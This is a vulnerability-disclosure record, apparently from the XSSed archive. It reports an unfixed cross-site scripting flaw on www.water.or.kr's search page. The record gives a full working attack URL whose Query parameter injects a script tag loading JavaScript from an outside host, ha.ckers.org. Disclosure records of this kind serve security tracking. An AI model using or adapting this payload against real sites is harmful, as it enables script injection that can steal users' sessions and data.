Unfixed XSS vulnerability at www.water.or.kr

ID XSSED:70424
Type xssed
Reporter d3vbit3
Modified 2011-12-21T00:00:00


Security researcher d3vbit3, has submitted on 01/11/2010 a cross-site-scripting (XSS) vulnerability affecting www.water.or.kr, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.water.or.kr:9990/verity_web/search_dev/hsearch_list.jsp?ServerSpec=water.or.kr:9930&ResultStart=1&ResultCount=10&QueryText=%28s%29&maxDocs=200&sortField=Score&sortSpec=Score+desc&Coll=all&Query=%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E